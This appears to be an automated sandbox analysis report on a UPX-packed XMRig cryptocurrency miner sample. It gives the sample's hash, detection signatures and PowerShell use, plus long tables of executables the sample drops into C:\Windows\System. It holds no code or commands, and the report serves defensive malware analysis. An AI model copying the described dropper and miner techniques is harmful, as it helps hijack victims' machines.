Malware Analysis Report

2024-11-16 12:05

Sample ID 240610-thmecsshml
Target aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0
SHA256 aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0

Threat Level: Known bad

The file aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0 was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Detects executables containing URLs to raw contents of a Github gist

UPX dump on OEP (original entry point)

xmrig

Xmrig family

XMRig Miner payload

UPX dump on OEP (original entry point)

Detects executables containing URLs to raw contents of a Github gist

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 16:03

Signatures

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 16:03

Reported

2024-06-10 16:06

Platform

win7-20240508-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\iawBxss.exe N/A
N/A N/A C:\Windows\System\IMxQeDg.exe N/A
N/A N/A C:\Windows\System\mdpHVaO.exe N/A
N/A N/A C:\Windows\System\hUiYhNq.exe N/A
N/A N/A C:\Windows\System\aoXmZlP.exe N/A
N/A N/A C:\Windows\System\WfDaPnl.exe N/A
N/A N/A C:\Windows\System\vYwvYEh.exe N/A
N/A N/A C:\Windows\System\cmSvGdc.exe N/A
N/A N/A C:\Windows\System\pCqwNwX.exe N/A
N/A N/A C:\Windows\System\SHtzeCg.exe N/A
N/A N/A C:\Windows\System\sDXcMzj.exe N/A
N/A N/A C:\Windows\System\dpXuEkL.exe N/A
N/A N/A C:\Windows\System\MKyDVGE.exe N/A
N/A N/A C:\Windows\System\FymJLDi.exe N/A
N/A N/A C:\Windows\System\XBepHJA.exe N/A
N/A N/A C:\Windows\System\LywOsCg.exe N/A
N/A N/A C:\Windows\System\MGIOPBR.exe N/A
N/A N/A C:\Windows\System\KoguhDL.exe N/A
N/A N/A C:\Windows\System\LIvLElR.exe N/A
N/A N/A C:\Windows\System\zsReYhU.exe N/A
N/A N/A C:\Windows\System\tvtLwKN.exe N/A
N/A N/A C:\Windows\System\ubnHeig.exe N/A
N/A N/A C:\Windows\System\iDiNEvG.exe N/A
N/A N/A C:\Windows\System\elxqewp.exe N/A
N/A N/A C:\Windows\System\qpIxbZk.exe N/A
N/A N/A C:\Windows\System\AGTlwZP.exe N/A
N/A N/A C:\Windows\System\gAkrhtC.exe N/A
N/A N/A C:\Windows\System\QMvrexs.exe N/A
N/A N/A C:\Windows\System\AzTwmte.exe N/A
N/A N/A C:\Windows\System\VXRqhJH.exe N/A
N/A N/A C:\Windows\System\cmzyXRx.exe N/A
N/A N/A C:\Windows\System\jjdWfMm.exe N/A
N/A N/A C:\Windows\System\yogLUqW.exe N/A
N/A N/A C:\Windows\System\LIIKaYf.exe N/A
N/A N/A C:\Windows\System\AljXIbV.exe N/A
N/A N/A C:\Windows\System\TqovUPM.exe N/A
N/A N/A C:\Windows\System\PuFmpuD.exe N/A
N/A N/A C:\Windows\System\StFWysm.exe N/A
N/A N/A C:\Windows\System\Dnxateq.exe N/A
N/A N/A C:\Windows\System\jbgHETG.exe N/A
N/A N/A C:\Windows\System\LXCzeVQ.exe N/A
N/A N/A C:\Windows\System\SqsKxdM.exe N/A
N/A N/A C:\Windows\System\HtdaRhO.exe N/A
N/A N/A C:\Windows\System\Gnvttgl.exe N/A
N/A N/A C:\Windows\System\EhcOFTk.exe N/A
N/A N/A C:\Windows\System\pLkDauB.exe N/A
N/A N/A C:\Windows\System\RCvVdpT.exe N/A
N/A N/A C:\Windows\System\biSLayY.exe N/A
N/A N/A C:\Windows\System\vrioLlo.exe N/A
N/A N/A C:\Windows\System\cyxDmfq.exe N/A
N/A N/A C:\Windows\System\QnwwXTM.exe N/A
N/A N/A C:\Windows\System\dWvXFjt.exe N/A
N/A N/A C:\Windows\System\yFuJIvY.exe N/A
N/A N/A C:\Windows\System\rsezCZI.exe N/A
N/A N/A C:\Windows\System\ToWXvSg.exe N/A
N/A N/A C:\Windows\System\AiXlAoS.exe N/A
N/A N/A C:\Windows\System\YRwHaoV.exe N/A
N/A N/A C:\Windows\System\TUJvnAa.exe N/A
N/A N/A C:\Windows\System\sbzfNka.exe N/A
N/A N/A C:\Windows\System\xkRdEpc.exe N/A
N/A N/A C:\Windows\System\hZAJYhG.exe N/A
N/A N/A C:\Windows\System\Nvssafp.exe N/A
N/A N/A C:\Windows\System\bdtqvwI.exe N/A
N/A N/A C:\Windows\System\pSYbQUX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\rUBgqpK.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\WzbTNCT.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\EfsPWNU.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\EqpLGjr.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\WWZZCOT.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\bQXjaxg.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\OKHhQZb.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\CmsGKzw.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BkawIbC.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\UGdORBC.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\PtlCKpJ.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\sKgCpGg.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\lXqkBuV.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\UnKpxDs.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\SgFOKYk.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\bpfmaAZ.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\ySyGdqs.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\bmKbIHK.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\JhycwSn.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\SHxeobK.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\aAjaNzG.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\DYoezPe.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\AVlFGiV.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\NEmCjXK.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BExouXl.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\vkfZCaN.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\khRePHY.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BEeBAmb.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\UOfkdIo.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\VEXzLUk.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\rJdWMAJ.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\IqVbbSV.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\WBZiyjq.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\vRoPxox.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\sqZUHvU.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\qbRaYGa.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\amMCjhO.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\KOVfGwm.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\gskDtAy.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\laPVTTN.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\jwmAteV.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\hjjqggN.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\yLRixvY.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BYQeGhn.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\CyFDoIb.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\EOMVynt.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\fDcZrRw.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\cDOwBbL.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\QfrfEuU.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\GXURfyn.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\TEjGeoK.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\OeWYYpA.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\SpFQirf.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
